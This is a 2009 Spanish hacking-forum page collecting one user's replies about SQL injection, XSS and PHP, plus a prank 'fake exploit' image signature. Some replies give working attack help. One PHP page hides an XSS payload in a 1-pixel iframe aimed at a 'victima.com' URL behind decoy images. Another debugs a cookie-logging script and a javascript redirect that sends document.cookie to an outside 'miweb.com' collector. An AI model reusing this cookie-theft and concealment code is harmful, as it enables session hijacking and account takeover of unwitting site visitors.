Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#4021
Hola, veo que necesitas aprender primero lo que es MySQL, como se programa, etc. Es dificil poder entender una inyección SQL si no sabes de SQL, te recomiendo que de pasada puedas aprender algo de php así que deberías buscar por ahi esos tutos donde enseñan sobre php+mysql y en base a eso vas leyendo de a poco sobre inyecciones.

http://foro.elhacker.net/nivel_web/gran_tutorial_sobre_inyecciones_sql_en_mysql-t237420.0.html

Talves ese tema te pueda aclarar muchas cosas.

Citarcuando introduces una ' produce un error de sintaxis, ¿esto ya quiere decir que es vulnerable?
No siempre pero si la mayoria de las veces.

Citary si es así, ¿cual es el siguiente paso?
Depende de lo que quieras lograr o a que vas, cuales son tus intenciones ya que en base a eso es lo que necesitarás hacer y para hacer necesitas primeramente lo que te dije antes.

Si te quedan mas dudas puedes ver algunos textos acá:
https://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_23209-t244090.0.html
http://es.wikipedia.org/wiki/Inyecci%C3%B3n_SQL
http://www.google.cl/search?hl=es&q=programacion+php%2Bmysql&btnG=Buscar&meta=

Si con todo esto sigues con dudas buelves y preguntas lo que desees.
#4022
Nivel Web / Re: gmail CSRF
4 Marzo 2009, 22:05 PM
http://packetstormsecurity.org/0903-exploits/gmail-xsrf.txt

Porque si la falla no aparece en milw0rm, packet storm, securityfocus, etc entonces no se parcha a menos que lo reportes directamente pero olvidate de que alguien de Google se va a dar el tiempo de buscar vulnerabilidades o de visitar sitios donde puedan dar algún indicio de estas fallas, en otras palabras puedes publicar un agujero de paypal en este foro y mientras no sea publicado en sitios de advisories conocidos entonces nunca lo sabrán (no significa que esté permitido hacerlo :P).
#4023
Nivel Web / Re: Duda sobre XSS
3 Marzo 2009, 21:03 PM
o con onload="alert(document.cookie)" pero si vas a hacer eso ps entonces mejor pones el javascript de plano en el html incrustado pero para que no se vea o por lo menos se disimule que se haga en un iframe y que ese iframe contenga un javascript cifrado talves con "web encript" y que imprima un location hacia el xss, es mas, ni si quiera necesitas hacer eso, basta con php y un <?php header('location: ...'); ?> ya que desde ajáx no compartes sesiones como para compartir las cookies haciendo llamadas remotas. Es mas, ni si quiera necesitas insertar otro archivo en el iframe:

Código (php) [Seleccionar]
<?php 
$xss 
'x"><sCrIpT s=d>r=document; alert(r.cookie);</ScRiPt><br x="x';
$distraccion[] = 
'http://www.unaplauso.com/images/anuncios/3/9/7/793_animacion-payaso-pitiklin_2.jpg';
$distraccion[] = 
'http://www.ctv.es/USERS/hnostar/TECH/V9000/payaso.jpg';
$distraccion[] = 
'http://mikevsdinos.files.wordpress.com/2008/09/payaso.jpg';
$distraccion[] = 
'http://www.galeriade.com/Sirona/data/media/3/Payaso_Moderno_-_DSC_2512.jpg';

$distraccion $distraccion[rand(0, (count($distraccion) - 1))];
?>

<html>
<img border="0" src="<?php echo $distraccion?>"/>
<br />
<iframe src="http://www.victima.com/vulnerable.php?variable=<?php
 
echo urlencode($xss); 
?>
" width="1" height="1" frameborder="0"></iframe>
</html>
#4024
Eso pasa cuando presionas muy fuerte el botón isquierdo del mouse.
#4025
Nivel Web / Re: Duda sobre XSS
2 Marzo 2009, 21:13 PM
Código (php) [Seleccionar]
<?php
/* VULN XSS */
session_start();
$_SESSION['x'] =  true;
echo 
$_GET['x'];
 
?>


Esa linea --> $_SESSION['x'] =  true; no le veo entido al igual que session_start() ya que no están siendo utilizadas, lo que necesitas es insertarle valores:

Código (php) [Seleccionar]
<?php
/* VULN XSS */
if(!$_COOKIE['x']){
 
setcookie('x''test');
 
$_COOKIE['x'] = 'test';
}
// echo nl2br(htmlspecialchars($_COOKIE['x'], ENT_QUOTES)); /* Forma correcta no vulnerable */
echo $_COOKIE['x']; /* Forma incorrecta vulnerable */
?>


Con esto ya estás declarando el valor de la cookie y podrás probar con ella.
#4026
Nivel Web / Re: Duda sobre XSS
2 Marzo 2009, 03:06 AM
Eso no debería funcionar a menos que el explorador sea vulnerable ya que cuando encierras una ejecución de script dentro de <img> esta no debería interpretar ningún tipo de código html y mucho menos javascript, por eso en las pruebas de concepto por lo general yo coloco un iframe de tamaño 1 pixel sin bordes ni scrollbars para evitar que se vea el punto de color negro.

Por lo que yo tengo entendido no puedes causar una ejecución arbitraria desde imagenes, hojas de estilos (a exepción de msie con expresion()), etc. Lo que si puedes hacer es causar un CSRF y esas cosas porque los headers se interpretan igual ya sean cookies, redirecciones, autentificación de acceso, etc.
#4027
Citarporque microsoft paga a los mods para no crear esa categoría
Y como crees que voy a tener para pagar la mensualidad de mi internet despues  :(
#4028
Nivel Web / Re: XSS no envia datos
1 Marzo 2009, 23:39 PM
Hay algunos servidores gratuitos y otros de pago donde por defecto traen un filtro bién pobre y molestoso, por ejemplo si usaste una variable llamada "act" en get entonces no te funcionará porque lo mas seguro es que te aparezca acceso denegado (asi pretenden evitar  una c99  :rolleyes:), en ese caso trata de cambiarlo. Intenta hacer pruebas tu mismo y haz esto:

Código (php) [Seleccionar]
<?php

 
die('Test: '.nl2br(htmlspecialchars($_GET['x'], ENT_QUOTES)));

 
$fp fopen("datos.txt""a+");
 
$cookie $_GET['x'];
 
$salto "\n-----------------------------\n";
 
fwrite($fp,$salto);
 
fwrite($fp,$cookie);
 
fclose($fp);
?>


Luego vas probando...
Citarcookies.php?x=prueba
Te debe aparecer "prueba", luego intentas con una cookie y vas a google y escribes arriba tu redirección y vas viendo que te aparece:
Citarjavascript:document.location='http://www.miweb.com/cookies.php?x='+document.cookie;

Si te aparece biéne toda la cokie y las demás cosas en cookies.php entonces significa que tienes rpoblemas al escribir sobre el archivo, intenta reemplazar "a+" por "x" en el fopen.
#4029
PHP / Fake Exploit como firma
28 Febrero 2009, 05:49 AM
Bueno, acá les dejo un pequeño código que hize para gastar una pequeña broma a los que vean esta firma:

Código (php) [Seleccionar]
<?php
if(!verifica_so()){
 
$texto[] = 'WHK@53rv3rh311:~# pl ./exploit.pl -verifica:'.$_SERVER[REMOTE_ADDR];
 
$texto[] = ' [!] Sistema Operativo incompatible.';
 
$texto[] = '';
 
$texto[] = 'WHK@53rv3rh311:~#';
}else{
 if(
verifica_so() == 'win'$direccion '0x00416FA0';
 if(
verifica_so() == 'linux'$direccion '0x00406F4C';
 if(
verifica_so() == 'unix'$direccion '0x00402360';
 
$texto[] = 'WHK@53rv3rh311:~# pl ./exploit.pl -ip:'.$_SERVER[REMOTE_ADDR].' -so:'.verifica_so();
 
$texto[] = ' --=[PoC BoF Linux/Win/Unix 2.5 Final by WHK]=--';
 
$texto[] = ' [+] Conectando ...';
 
$texto[] = ' [!] Retorno --> '.$direccion;
 
$texto[] = ' [+] Lanzando ...';
 
$texto[] = ' [+] Completado con éxito!';
 
$texto[] = '';
 
$texto[] = 'WHK@53rv3rh311:~#';
}

$handle imagecreate(400105);

$fondo imagecolorallocate($handle000);
$color_texto imagecolorallocate($handle02550);
$salto 5;
foreach(
$texto as $linea){
 
imagestring($handle210$salto$linea$color_texto);
 
$salto $salto 12;
}
header("Content-type: image/png");
imagepng($handle);

function 
verifica_so(){
 if(
eregi('Windows'strtolower($_SERVER[HTTP_USER_AGENT]))) return 'win';
 if(
eregi('linux'strtolower($_SERVER[HTTP_USER_AGENT]))) return 'linux';
 if(
eregi('unix'strtolower($_SERVER[HTTP_USER_AGENT]))) return 'unix';
 return 
false;
}
?>


Prueba:


Pueden modificarlo y cargarlo con imagenes no se, hagan lo que quieran con el código.
#4030
Citarcomo hacer el log off
Código (php) [Seleccionar]

function desloguear(){
@setcookie('pass_login', '');
$_COOKIES['pass_login'] = '';
}


Citary creo que se puede hacer mas para evitar SQLi
Puedes utizar mysql_real_escape_string
http://cl.php.net/function.mysql-real-escape-string
Sin la necesidad de procesar todo en forma cifrada.